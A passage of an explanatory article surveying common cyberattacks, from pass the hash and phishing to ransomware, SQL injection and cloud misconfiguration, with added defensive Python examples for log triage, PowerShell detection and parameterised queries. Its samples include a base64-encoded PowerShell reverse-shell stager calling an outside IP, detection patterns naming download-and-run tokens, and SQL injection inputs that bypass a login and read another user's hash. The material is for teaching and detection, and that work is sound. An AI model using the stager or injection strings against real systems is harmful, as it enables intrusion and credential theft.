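        return next_url if next_url.startswith("/") else default  # plain path
    # hostname (not netloc) so user@host and host:port tricks do not fool the check
    if parsed.scheme in ("http", "https") and parsed.hostname in trusted_hosts:
        return next_url
    return default


def edit_distance(a, b):
    """Levenshtein distance by the usual row-by-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(host, brands=("example.com",), max_distance=2):
    """Brand a host imitates, or None. The brand itself and its subdomains pass.

    Simplification: the last two labels stand in for the registered domain."""
    host = host.lower().rstrip(".")
    registered = ".".join(host.split(".")[-2:])
    for brand in brands:
        if registered == brand:
            return None
        if edit_distance(registered, brand) <= max_distance:
            return brand
    return None


if __name__ == "__main__":
    for u in ("/account", "//203.0.113.9/login", "https://www.example.com/dash",
              "https://www.example.com.evil.test/x", "http://www.example.com@203.0.113.9/"):
        print(u, "->", safe_redirect(u))
    for h in ("www.example.com", "examp1e.com", "login.exarnple.com"):
        print(h, "->", lookalike_of(h))
```

The lookalike check runs on the redirect chain’s final host or on newly registered domain feeds; for brand protection it is used defensively to flag registrations, not to pick targets.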
Part of the reason for the success of the well-publicized Target customer account hack was the widely used attack method known as pass the hash (PtH). Using PtH, the hackers obtained an NT hash, which let them log in to the Active Directory administrator’s account without needing the plaintext password. That gave them the authority to create a new domain admin account and add it to the Domain Admins group. This flaw in the system is what allowed them to obtain Target customers’ payment card numbers and personal information.
What is essential to know:
By bypassing the plaintext password and using the underlying NTLM or LanMan hash, an attacker can authenticate as the user. Once they have a valid username and the hash of that user’s password, they can access the user’s account and carry out actions on local or remote systems.
Hashed passwords basically take the place of the original passwords from which they were derived.
The attack takes place as follows: A user’s password or passphrase is never entered in cleartext on systems that use NTLM authentication. Rather, in response to a challenge-response authentication scheme, it is delivered as a hash.
A credential-access technique is then used to obtain valid password hashes for the account being used.
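Because the hash is presented through the normal NTLM challenge-response, the logon succeeds and is recorded as such; what gives it away is the shape of the resulting 4624 event and the pattern of one account fanning out across many hosts. The following added example (not code from the article; the event records are constructed and simplified, and the rule is the commonly published heuristic, stated here as an assumption to be tuned per environment) flags network or NewCredentials logons that used the NTLM package with a zero key length and reports accounts that hit several hosts that way within a short window.

```python
"""Heuristic pass-the-hash triage over Windows 4624 logon events.

Added example, not code from the article. The events are constructed and the
field names are a simplification of the Security log. The rule (logon type 3 or
9, NTLM package, key length 0, one account reaching many hosts within minutes)
is the commonly published heuristic and is an assumption to tune per environment.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    # Ordinary interactive Kerberos logon (key length is reported as 0 for Kerberos).
    {"time": "2024-01-10T09:00:00", "event_id": 4624, "logon_type": 2, "auth_package": "Kerberos",
     "key_length": 0, "account": "jsmith", "target_host": "WS01"},
    # Ordinary NTLM network logon from a service with a 128-bit session key.
    {"time": "2024-01-10T09:03:00", "event_id": 4624, "logon_type": 3, "auth_package": "NTLM",
     "key_length": 128, "account": "backup_svc", "target_host": "FS01"},
    # The suspect cluster: NTLM, key length 0, four hosts in 35 minutes.
    {"time": "2024-01-10T09:05:00", "event_id": 4624, "logon_type": 3, "auth_package": "NTLM",
     "key_length": 0, "account": "itadmin", "target_host": "FS01"},
    {"time": "2024-01-10T09:06:00", "event_id": 4624, "logon_type": 3, "auth_package": "NTLM",
     "key_length": 0, "account": "itadmin", "target_host": "DC01"},
    {"time": "2024-01-10T09:07:00", "event_id": 4624, "logon_type": 9, "auth_package": "NTLM",
     "key_length": 0, "account": "itadmin", "target_host": "WS12"},
    {"time": "2024-01-10T09:40:00", "event_id": 4624, "logon_type": 3, "auth_package": "NTLM",
     "key_length": 0, "account": "itadmin", "target_host": "WS13"},
]


def is_pth_shaped(ev):
    """Successful logon negotiated with NTLM over the network (or as NewCredentials)
    and no session key: the shape of a replayed hash rather than a typed password."""
    return (
        ev["event_id"] == 4624
        and ev["logon_type"] in (3, 9)
        and ev["auth_package"].upper() == "NTLM"
        and ev["key_length"] == 0
    )


def pth_shaped(events):
    return [ev for ev in events if is_pth_shaped(ev)]


def lateral_spread(events, window=timedelta(minutes=10), min_targets=3):
    """Accounts whose PtH-shaped logons reach >= min_targets hosts inside one window."""
    by_account = defaultdict(list)
    for ev in pth_shaped(events):
        by_account[ev["account"]].append((datetime.fromisoformat(ev["time"]), ev["target_host"]))
    hits = {}
    for acct, logons in by_account.items():
        logons.sort()
        for i, (t0, _) in enumerate(logons):
            targets = {host for t, host in logons[i:] if t - t0 <= window}
            if len(targets) >= min_targets:
                hits[acct] = sorted(targets)
                break
    return hits


if __name__ == "__main__":
    print(len(pth_shaped(SAMPLE_EVENTS)), "PtH-shaped logons")
    print(lateral_spread(SAMPLE_EVENTS))
```

A single PtH-shaped logon is weak evidence on its own (plenty of legacy tooling still authenticates with NTLM), which is why the second function looks for the fan-out; the cluster for itadmin trips it on the three hosts reached between 09:05 and 09:07, while the later WS13 logon falls outside the window.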
Where the attack originates: This kind of attack is more sophisticated than previous approaches, and it is typically carried out by highly motivated, well-organized threat groups that have their eyes set on a particular individual or organization and are hoping to obtain financial or political advantage.
Twilio, a customer engagement platform, suffered its second significant breach in June 2022. The hackers known as “0ktapus,” who were responsible for both incidents, used voice phishing, posing as Twilio’s IT department over the phone, to trick an employee and obtain client data. Believing they were talking to an authorized official, the staff member gave the threat group their corporate login credentials. As a result of this compromise, a small number of customer contact details were accessed without authorization.
What you should know: Phishing attacks use email, direct messaging, or other forms of communication to trick common users, consumers, or employees into clicking on a malicious link that will often take them to a phony website asking for personally identifiable information like credit card numbers, bank account numbers, or passwords. Be cautious since, despite their plausible appearance, these fraudulent websites will collect any personal data you provide. Alternatively, they might start a virus campaign to steal money from your accounts, personally identifiable consumer data, or other important resources.
How the attack works: Usually, you’ll be tricked into opening malicious attachments or clicking links that take you to websites that are almost exact replicas of trustworthy websites by means of an email that purports to be from a boss or colleague.
Where the attack originates: A few decades ago, the Nigerian criminal code designated some types of fraud as 419 schemes, which led to a significant amount of phishing assaults coming from Nigeria. According to the InfoSec Institute, phishing assaults nowadays come from all over the world, with a large number happening in the BRIC (Brazil, Russia, India, and China) nations. Phishing campaigns can be started by hackers with little technological expertise due to the accessibility and ease of use of phishing toolkits. These efforts are being run by a variety of actors, including organized cybercriminals and lone hackers.
A novel phishing attempt has surfaced, ascribed to the threat group TA866, in which victims’ devices are screenshotted by an initial malware payload. This enables the attackers to determine whether additional malware should be installed and assess the victim’s prospective value. Over a thousand American and German groups have been the focus of this effort thus far.
What you should know: Phishing is still the most common and harmful cyberthreat, despite its apparent simplicity. Phishing emails are actually the starting point of up to 91% of successful attacks, according to studies.
The senders of these emails may pose as recognizable contact names, utilize email scraping techniques, use bogus domains, and employ other strategies to trick their victims into opening an attachment that contains a harmful payload, clicking on a dangerous link, or providing sensitive personal information that could be intercepted by the attackers. The transferred data that contains the intended message is referred to as the “payload.”
Headers and metadata are transmitted only to carry the payload to its intended recipient.
How the attack takes place:
This attack follows a standard pattern: the attacker first sends a phishing email, and the target, after reading it, downloads the attached file, usually a .docx or .zip file with an embedded .lnk file. The attack is successful when the .lnk file launches a PowerShell script that, in turn, starts a reverse shell.
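The chain above (shortcut file launching PowerShell, which then makes an outbound connection) leaves a recognisable trace in endpoint telemetry. The following is an added detection example, not part of the original text: it scores process-creation events shaped like Sysmon Event ID 1 records. All field values, paths and the sample command lines are constructed, and the indicator lists are illustrative rather than exhaustive.

```python
import base64
import re

# Illustrative indicator patterns; tune them to your environment.
STEALTH_ARGS = re.compile(
    r"-(?:nop|noprofile|noni|noninteractive|ep\s+bypass|executionpolicy\s+bypass"
    r"|w\s+hidden|windowstyle\s+hidden)\b", re.I)
ENCODED_ARG = re.compile(r"-(?:enc|encodedcommand|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
NETWORK_TOKENS = re.compile(
    r"net\.sockets\.tcpclient|downloadstring|downloadfile|invoke-webrequest"
    r"|\biex\b|invoke-expression", re.I)
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """-EncodedCommand carries base64 of a UTF-16LE script; return it decoded, or ''."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:
        return ""


def score_event(ev: dict):
    """Score one process-creation event (Sysmon ID 1 style fields).
    Returns (score, reasons); each independent indicator adds one point."""
    if not ev["Image"].lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return 0, []
    cmd = ev["CommandLine"]
    decoded = decode_encoded_command(cmd)
    reasons = []
    if ev["ParentImage"].lower().endswith("\\explorer.exe"):
        reasons.append("spawned by explorer.exe, as a double-clicked .lnk would be")
    if decoded:
        reasons.append("encoded command: " + decoded.strip()[:60])
    if STEALTH_ARGS.search(cmd):
        reasons.append("hidden-window / policy-bypass arguments")
    if NETWORK_TOKENS.search(cmd + " " + decoded):
        reasons.append("outbound-connection or download-and-run token")
    if TEMP_DIR.search(ev.get("CurrentDirectory", "") + " " + cmd):
        reasons.append("working directory is a temp/extraction folder")
    return len(reasons), reasons


def triage(events, threshold: int = 3):
    """Return [(ProcessId, reasons)] for events at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["ProcessId"], reasons))
    return hits


# Constructed sample telemetry: one shortcut-launched stager, two benign runs.
_STAGER = "$c = New-Object Net.Sockets.TCPClient('203.0.113.5', 4444)"
_B64 = base64.b64encode(_STAGER.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _B64,
     "CurrentDirectory": "C:\\Users\\victim\\AppData\\Local\\Temp\\Temp1_invoice.zip\\"},
    {"ProcessId": 4188, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1",
     "CurrentDirectory": "C:\\Scripts\\"},
    {"ProcessId": 4210, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe",
     "CurrentDirectory": "C:\\Users\\victim\\"},
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS):
        print(pid, *reasons, sep="\n  ")
```

A user simply opening a PowerShell console from the Start menu scores one point (explorer.exe parent) and stays below the threshold, which is why the score combines several independent indicators.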
Where the attack originates: Since phishing is the foundation of most cyberattacks, this attack can come from anywhere in the world because it doesn’t require a high level of sophistication.
In addition to going after larger targets these days, spear phishers are also adopting a tactic from romance scams, enticing victims with eye-catching false profiles in order to trick them into downloading malware onto their machines.
Researchers discovered a multi-year social engineering and targeted malware campaign associated with the well-known threat actor TA456, which is affiliated with the Iranian regime. Through the use of a fictitious social media account named “Marcella Flores,” TA456 established a romantic connection with a worker at a tiny subsidiary of an aerospace defense firm. A few months later, the attacker cashed in on the relationship by sending a sizable malware file through an active business email thread in an attempt to carry out reconnaissance.
After the malware, known as LEMPO, gained access to the computer, it exfiltrated data and transmitted extremely private information to the attacker.
What is essential to know:
Spear phishing is a subset of phishing in which cybercriminals deliberately target you with a tailored email message in an attempt to fool targets or employees of a target firm into divulging confidential or financial information or granting access to the network. Spear phishers target people who are either weak links in the network or have access to sensitive information. Targets with high value, including C-level executives, board members, or administrators with special access, are more susceptible since they have access to confidential data and vital systems.
How the attack takes place:
Spear phishers use social media platforms like LinkedIn to conduct research on targets and their professional positions. They then use fictitious addresses to send extremely tailored, convincing-looking communications that penetrate the target’s systems and infrastructure. After gaining access to the environment, hackers try to execute even trickier plans.
Where the attack is coming from: Both people and groups are responsible for this attack. Nonetheless, a lot of well-publicized spear phishing attempts are outsourced to state-sponsored cybercrime groups, who have the means to investigate their targets and get past robust security measures.
When you can phish a whale, why chase after tiny phish? Australian hedge fund Levitas Capital learned that the hard way when hackers launched a covert whaling operation aimed directly at one of its founders. The malicious actors infiltrated the hedge fund’s network by sending the executive a phony Zoom link, which, when opened, downloaded malware. Through the use of malicious code, the attackers were able to gain access to the intended email account and produce false invoices that were sent to the trustee and third-party administrator of the fund. These individuals then approved and started requests for financial transfers, which led to the theft of $8.7 million. A request for a $1.2 million payment to the dubious private equity business Unique Star Trading was also included in the fake invoices. The company was ultimately forced to permanently close as a result of the severe and massive losses.
What you should know: A single, high-value target, such as the CEO of a financial services company, is the objective of a whale attack. A phishing email may target any employee at the organization, but the target is always someone particular. Additionally, because high-profile targets may hold sensitive or vital information, hackers typically target them.
How the attack is carried out: A whaling attack employs a traditional phishing approach. The victim receives what appears to be a real email requesting him or her to click on a link that takes them to a website that requests sensitive data, like a password, or contains dangerous code.
Where the attack originates:
Since phishing is the most frequent way for cyberattacks to start, a whaling attack might come from anywhere in the globe.
For instance, the Levitas Capital attack was attributed to a group of cybercriminals from different parts of the world, and payments were made to United Overseas Bank in Singapore and Bank of China.
In 2022, Okta, a single sign-on provider used by thousands of businesses and governments globally, was successfully hacked, according to public boasts made by the criminal hacking group Lapsus$, which was purportedly led by a teenage boy from Oxford, England. Lapsus$ was able to access the employee’s laptop for five days, including privileged access to certain Okta systems, after gaining access to a “super user” administrative account for Okta through a third-party support engineer. On its Telegram channel, the cybercrime organization shared information about the hack. They even included screenshots demonstrating that the attack was inside Okta’s servers. However, the real objectives were Okta’s 15,000 clients rather than Okta itself. A week later, the hacking gang gained 15,000 new followers on Telegram, igniting speculation about impending strikes.
What you should know: It’s commonly acknowledged that the misuse of privileged credentials is a major contributing factor in many significant data breaches. These are user accounts with higher privileges, like root or domain administrator accounts. Attackers are increasingly gaining access to an organization’s data and resources by utilizing privileged user credentials to steal confidential information. With privileged user credentials, an attacker can take over an organization’s infrastructure and change security settings, steal data, establish user accounts, and more, all while seeming authentic and making themselves more difficult to find.
How the attack takes place:
Via the use of malware, spear-phishing emails, social engineering tactics, or “pass the hash” attacks, attackers try to obtain access to privileged accounts. In order to accommodate a workforce that is becoming more mobile and dispersed, organizations have opened their networks, allowing suppliers and service providers to access a complicated web of remote access. There are many of those connections, including those to the cloud, that require strong privileged account credentials to access. It can be difficult to identify, regulate, and monitor access to all of those connections, which provides opportunities for bad actors.
Attackers enter after gaining the credentials and take whatever they can, including SSH keys, certificates, and domain administration hashes. Furthermore, all it takes for a significant data breach that can bring down a whole corporation is one successful account hit.
Where the attack originates: User compromise is widely appealing and frequently used in cyberattacks of all kinds, whether nation-state cyber espionage motivated by political ideology or sophisticated, financially motivated cybercrime groups like Lapsus$. This is because it gives attackers broad, hard-to-detect access to every kind of data the compromised user is privileged to reach.
Ransomware attacks impacted at least 948 government entities, educational institutions, and healthcare facilities in the US in 2019, potentially costing over $7.5 billion, according to cybersecurity firm Emsisoft.
These attacks could have the following effects on the medical field: patients could be sent to other hospitals; medical records could become inaccessible or lost forever; and emergency dispatch centers could be forced to track emergency responders in the field using paper logs and printed maps.
For governments, local 911 services may be interrupted. Furthermore, according to Manhattan District Attorney Cyrus Vance Jr., ransomware might have an impact just as severe and expensive as a natural calamity like Hurricane Sandy.
What you should know: Ransomware is an assault in which the victim’s data is encrypted by an infected host and held captive until the attacker is paid a ransom. Recent ransomware attacks have shown that hackers are threatening to sell or release the stolen data, which greatly increases the potential damage that these types of assaults can do.
Although there are many different kinds of ransomware, some are particularly malicious. A well-known gang called Blackmatter has targeted several businesses that are vital to the American infrastructure and economy, such as the food and agriculture sector. Another kind of ransomware to be wary about is Ryuk. With a $12.5 million ransom, Ryuk had the biggest ransom on record as of 2019.
How the attack is carried out: In addition to standard remote service-based exploitation, attackers can use spear phishing campaigns and drive-by downloads to infect individuals and enterprises with ransomware. After the virus has been placed on the victim’s computer, it either shows a pop-up window or takes the user to a website where it notifies them that their files are encrypted and that they can only unlock them by paying a ransom.
On the other side, ransomware operators and affiliates use a business model called Ransomware as a Service (RaaS), in which affiliates pay to initiate ransomware attacks that the operators have created. RaaS kits enable affiliates to get up and running quickly and economically even if they lack the expertise or time to create their own ransomware variation. User reviews, forums, bundled deals, round-the-clock assistance, and other features that are similar to those provided by reputable SaaS providers can all be found in a RaaS kit.
Where the attack originates: Attacks on governments or large corporations, which require sophisticated technology, have historically been the domain of sophisticated cybercriminals who go unidentified.
But with the introduction of cryptocurrencies, which make anonymous transactions easier, ransomware attacks are becoming more commonplace for the general public.
RaaS kits are routinely marketed on the dark web and are quite easy to use, so any novice hacker with the funds to purchase one could launch an attack.
An infrastructure and router attack that targeted Cisco involved a router “implant” known as SYNful Knock, which was allegedly present in 14 routers across four nations. Through the use of a modified Cisco IOS software image, SYNful Knock is a sort of persistent malware that enables an attacker to take control of an infected device and compromise its integrity.
According to Mandiant, the device is activated via specially constructed TCP packets that are transmitted to it, and several modules that are enabled using the HTTP protocol.
What you should know: Router implants are thought to be primarily theoretical in nature and use, and they have been extremely unusual.
But according to recent vendor alerts, they have been spotted in the wild. Attackers most likely gain access to these devices by finding well-known flaws or by focusing on those with easy-to-guess default passwords.
The router is a prime target for re-entry or additional infection because of its location inside the network.
How the attack takes place:
Networking equipment, including switches and routers, is frequently disregarded as a tool that hackers could use to compromise a company. Once network devices are compromised, attackers can gain direct access to the internal infrastructure of the business, thereby expanding the attack surface and gaining access to private services and data.
Where the attack originates: These crucial assets are frequently targeted by advanced threat actors, who use them to siphon off and reroute network traffic, flash backdoored operating system images, and weaken cryptographic configurations so that network traffic is easier to decrypt.
With the increased speed and ease of use of software as a service (SaaS) applications, employees can now download solutions directly onto their workstations to assist in completing tasks. Many people, nevertheless, are utilizing these apps carelessly when it comes to security. According to a Forbes Insights survey titled “Cyber Resilience Perception Gaps: What Could Go Wrong?”, more than one in five firms reported having encountered a cyber event that started with an unapproved, or “shadow,” IT resource. This finding is not surprising.
What is essential to know:
The term “shadow IT” describes IT programs and systems that staff members utilize without the IT department’s knowledge or approval. These can consist of additional programs, web services, cloud apps, hardware, and software. Typically, these programs are downloaded and used by well-meaning workers who want to simplify or expedite their work. Shadow IT is such a widespread phenomenon that, according to Gartner, it accounts for one-third of all enterprise cybersecurity assaults. Users frequently unknowingly open the door for insider threats, data breaches, and compliance issues because they are using these apps mostly beneath the radar.
How the attack takes place:
As the term implies, shadow IT operates out of sight: employees exchange or keep data on unapproved cloud services, which creates a number of security and compliance issues.
When workers upload, distribute, or store sensitive or regulated data into shadow IT apps without the proper security and data loss prevention (DLP) measures in place, breaches may happen. The information that is made public subsequently becomes a prime target for data theft and insider threats, and it may also result in expensive compliance violations. Furthermore, there may be security flaws and endpoint vulnerabilities in the apps themselves.
Where the attack originates: In this instance, an organization is the source of the threat. Workers that use shadow IT apps typically do so to get around restrictive policies or to complete tasks more quickly; they are not always doing so to endanger their companies or fellow employees. They eventually do, however, offer a large opening for malevolent insiders or outside hackers attempting to take advantage of security flaws in these systems.
A group of hackers known as the “Chuckling Squad” released a barrage of extremely nasty messages to Twitter CEO Jack Dorsey’s 4.2 million followers on August 30, 2019. After obtaining Dorsey’s phone number through simjacking, the group used a text-to-tweet service that Twitter had purchased to broadcast the messages. Millions of people saw the inflammatory tweets, even though they were only available online for less than 10 minutes.
What is essential to know:
SIMjacking is a sort of account takeover that typically targets a hole in two-factor authentication and two-step verification in which the second factor is a text message (SMS) or call to a mobile phone. It is also known as a SIM swap scam, port-out scam, SIM splitting, and SIM swapping. Simjacking, to put it simply, is the act of an attacker posing as a target to a cellular provider in order to obtain the target’s phone number and have it moved to a new SIM card (which the hacker already has).
How the attack takes place:
Pretending to be the target, a hacker phones a cell service provider’s help line and reports that they have misplaced their SIM card. Because they have obtained some of the target’s personal data (passwords, address, or SSN) through one of the numerous database breaches that have occurred over the past ten years, they are able to authenticate their identity. The employee of the service provider flips the switch because they have no means of knowing that the person on the other end of the line is not who they claim to be. That phone number, which is the secret to so much of modern life online, is suddenly in the attacker’s hands.
Where the attack originates: Most often, scammers try to coerce victims into parting with extremely valuable assets (such as high-value social media accounts, Bitcoin wallets, or other cryptocurrency wallets) or destroy their reputations (like Chuckling Squad did with Jack Dorsey). These hackers might be lone individuals or members of formal groups, and they can originate from anywhere in the world.
It’s no secret that spyware attacks are still happening far too frequently. However, you’re probably a bigger target if you’re a well-known person. Authorities declared that malevolent actors had used the Pegasus spyware to target the cellphones of Spanish Defense Minister Margarita Robles and Prime Minister Pedro Sánchez on multiple occasions. This led to a considerable loss of data from both phones and caused severe disruptions to Spain’s government systems and administrators.
What is essential to know:
Malware that tracks or sells a victim’s online behavior (such as searches, history, and downloads), obtains bank account information, and even attempts to steal a target’s identity is known as spyware. There are several varieties of spyware, and they all use different methods to follow their targets. In the end, spyware has the ability to take control of a device and exfiltrate data or communicate private information to an unidentified third party without the user’s knowledge or consent.
How the attack is carried out: Although spyware can be installed on a victim’s device in a number of ways, it usually gains access to a system by tricking the target or taking advantage of security holes in the system. This can occur when a user opens email attachments from unfamiliar senders, downloads software or updates from dubious sources, accepts prompts or pop-ups without thinking, or pirates films and music.
Where the attack originates: With the widespread availability of crimeware kits, an attack of this nature can originate from any location. However, the majority of the time, they come from malicious companies hoping to sell a victim’s personal data to another party.
SQL (also pronounced “sequel”) is the common programming language for interacting with relational databases, the systems that underpin all data-driven websites and online applications. By inserting a specially crafted SQL query into a form (thereby injecting it into the database), an attacker can exploit this (quite popular) system and gain access to the database, servers, and network. SQL injection attacks are still a common form of attack. In August 2020, the Freepik Company announced a data breach that affected over eight million user logins. The breach was caused by a SQL injection in a global database of customizable icons, which gave hackers access to user login credentials and personal data.
What you should know: SQL injection is a kind of injection attack in which malicious SQL statements are used to alter or destroy databases. If user inputs are not properly sanitized, the SQL statements that manage your website’s database can be manipulated to circumvent security safeguards.
How the attack is carried out: An SQL injection attack involves “injecting” or inserting a SQL query into the program through input data from the client. A successful SQL injection exploit can get the contents of a specific file located on the DBMS file system, read and alter sensitive data from databases, perform database management tasks, and in certain situations, send commands to the operating system.
Where the attack originates: SQL injection attacks are quite popular since relational databases provide the foundation of so much of the internet. Finding “injection” in the Common Vulnerabilities and Exposures database yields 15,000 results.
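To make the mechanism concrete, here is an added example (not from the original text) of the login query the attack targets, written once with string concatenation and once with bound parameters, against an in-memory SQLite database. The table, rows and attacker inputs are constructed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed rows standing in for a site's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "hash-of-alices-password", "admin"),
        ("bob", "hash-of-bobs-password", "user"),
    ])
    return conn


def login_vulnerable(conn, username: str, password_hash: str):
    """Builds the statement by string concatenation. The DBMS receives one string
    and cannot tell the developer's SQL from the visitor's input."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password_hash = '" + password_hash + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password_hash: str):
    """Same query with bound parameters: the statement shape is fixed before the
    values arrive, so quotes and comment markers in the input are only data."""
    sql = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    row = conn.execute(sql, (username, password_hash)).fetchone()
    return row[0] if row else None


# Constructed attacker inputs, showing the two effects the text describes:
# bypassing a check, and reading data the query was never meant to return.
BYPASS_INPUT = "alice' --"                      # comments out the password check
READ_INPUT = ("x' UNION SELECT password_hash FROM users "
              "WHERE username = 'bob' --")      # returns another column instead

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, BYPASS_INPUT, "anything"))      # alice
    print(login_vulnerable(db, READ_INPUT, "anything"))        # hash-of-bobs-password
    print(login_safe(db, BYPASS_INPUT, "anything"))            # None
    print(login_safe(db, "alice", "hash-of-alices-password"))  # alice
```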
A supply chain attack can do a great deal of harm, as demonstrated by the SolarWinds attacks, which some experts have dubbed the worst cyberattack series in history. In 2020, experienced attackers, allegedly working on behalf of the Russian intelligence service, penetrated SolarWinds software.
They installed malware on it, which was subsequently made available through a product update, providing them backdoor access to all of the networks of SolarWinds Orion Platform users. Up to 18,000 users—including Fortune 500 corporations and numerous US government agencies—installed updates that made them susceptible to hackers. It’s truly your worst nightmare, as SolarWinds vice president of security Tim Brown put it.
What you should know: A supply chain attack is a potent cyberattack that can get past even the most advanced security measures by using reputable third-party suppliers. Vendors frequently lose their customers’ data in a cyberattack because they require access to sensitive data in order to interface with their customers’ internal systems. Additionally, a single supply chain attack allows hackers access to the sensitive data of several companies in a variety of industries because vendors hold sensitive data for numerous clients. One cannot stress how serious supply chain attacks are. Furthermore, the recent wave of these assaults implies that state actors are increasingly using this strategy as their go-to approach.
How the attack occurs: A supply chain attack targets the vendor’s software source code, updates, or build procedures in order to obtain complete access to a company’s data through reputable, trusted processes. Because they arrive from an unexpected angle of the attack surface, they are hard to detect. Compromised vendors then unwittingly spread malware throughout the networks of their clients. Malware on connected devices, third-party software updates, and program installers can all compromise victims’ security.
With little work on the part of the hacker, who now has “legitimate” access to migrate laterally across thousands of firms, a single software update can infect thousands of organizations.
Where the attack originates:
Supply chain assaults are large-scale, highly skilled attacks carried out by highly skilled threat actors; these attacks are frequently sponsored by nation-states and driven mostly by ideology, though money is also a major factor.
The 2022 Verizon Data Breach Investigations Report (DBIR) states that 82% of breaches had a “human element,” and that misconfigured cloud storage is to blame for an increase in “miscellaneous errors.”
The majority of security and IT professionals (67%) store sensitive data in public cloud environments, according to the Sensitive Data in the Cloud report. Additionally, one-third of respondents expressed lack of confidence or only slight confidence in their ability to protect sensitive data in the cloud.
This kind of technological and professional error is precisely the reason why cloud accounts have become a hot commodity in this age of remote work, whether it is due to a misconfigured database or insufficiently skilled security staff.
What you should know is that attackers have plenty of chance to locate and take advantage of both known and undisclosed vulnerabilities because data is now extensively (and much too frequently, recklessly) scattered across the cloud.
This is particularly true as businesses rush to move to the cloud, thereby compromising or configuring security settings incorrectly.
This is further complicated by the shared responsibility model: according to the Cloud Security Alliance (CSA), cloud service providers (CSPs) cover certain elements, processes, and functions, but the customer is responsible for securing its proprietary data, code, and any other assets of note. Assets and applications need to be secured in accordance with that model.
But when that duty is neglected, attackers will be waiting.
How the attack happens: When a malicious actor gains access to a company’s cloud infrastructure because of misconfigured, shoddy, or nonexistent security settings, an assault on cloud storage occurs. As soon as they’re inside, they’ll begin turning off security measures like access monitoring. In order to maintain access, they might make new accounts and run commands that aren’t usual for the kind of user or system in question. They might also alter storage bucket restrictions to provide public access to an organization’s contents, which could result in data exfiltration. Thankfully, all of these occurrences are noteworthy and will be simple to follow and locate in the audit logs of the CSP.
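Each of the actions listed above (switching off monitoring, creating new identities, behaviour unusual for the identity in question, and making a bucket public) appears in the provider’s audit log. The following is an added example, not from the original text, that runs those four checks over constructed events shaped approximately like CloudTrail records; the account id, principals, bucket names, event times and the per-identity baseline are all constructed, and the field layout is a simplification of the real schema.

```python
import json

# Constructed baseline: which API families each identity normally calls.
WEB = "arn:aws:sts::123456789012:assumed-role/web-app/i-0abc"
ADMIN = "arn:aws:iam::123456789012:user/ops-admin"
EXPECTED_SOURCES = {WEB: {"s3.amazonaws.com", "dynamodb.amazonaws.com"}}

LOGGING_TAMPER = {"StopLogging", "DeleteTrail", "UpdateTrail", "PutEventSelectors",
                  "DeleteFlowLogs", "DisableAlarmActions"}
PERSISTENCE = {"CreateUser", "CreateAccessKey", "CreateLoginProfile",
               "AttachUserPolicy", "UpdateAssumeRolePolicy"}


def grants_public_access(ev: dict) -> bool:
    """True when a bucket policy or ACL change opens the bucket to everyone."""
    params = ev.get("requestParameters") or {}
    if ev["eventName"] == "PutBucketPolicy":
        policy = params.get("bucketPolicy") or {}
        if isinstance(policy, str):
            policy = json.loads(policy)
        for stmt in policy.get("Statement", []):
            principal = stmt.get("Principal")
            public = principal == "*" or (
                isinstance(principal, dict) and principal.get("AWS") == "*")
            if stmt.get("Effect") == "Allow" and public:
                return True
    if ev["eventName"] == "PutBucketAcl":
        acl = params.get("AccessControlPolicy") or {}
        for grant in acl.get("AccessControlList", {}).get("Grant", []):
            uri = grant.get("Grantee", {}).get("URI", "")
            if uri.endswith(("/AllUsers", "/AuthenticatedUsers")):
                return True
    return False


def analyze(events):
    """Return (eventTime, principal, finding) for the behaviours worth alerting on."""
    findings = []
    for ev in events:
        who, name, when = ev["userIdentity"]["arn"], ev["eventName"], ev["eventTime"]
        if name in LOGGING_TAMPER:
            findings.append((when, who, f"monitoring disabled: {name}"))
        if name in PERSISTENCE:
            findings.append((when, who, f"new credential or identity: {name}"))
        if grants_public_access(ev):
            bucket = (ev.get("requestParameters") or {}).get("bucketName", "?")
            findings.append((when, who, f"bucket made public: {bucket}"))
        baseline = EXPECTED_SOURCES.get(who)
        if baseline is not None and ev["eventSource"] not in baseline:
            findings.append((when, who, f"unusual API family for this identity: {ev['eventSource']}"))
    return findings


# Constructed events: a compromised web-app role working through the steps above.
SAMPLE_EVENTS = [
    {"eventTime": "2023-03-01T02:10:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "GetObject", "userIdentity": {"arn": WEB},
     "requestParameters": {"bucketName": "app-assets", "key": "logo.png"}},
    {"eventTime": "2023-03-01T02:14:00Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "StopLogging", "userIdentity": {"arn": WEB},
     "requestParameters": {"name": "org-trail"}},
    {"eventTime": "2023-03-01T02:15:00Z", "eventSource": "iam.amazonaws.com",
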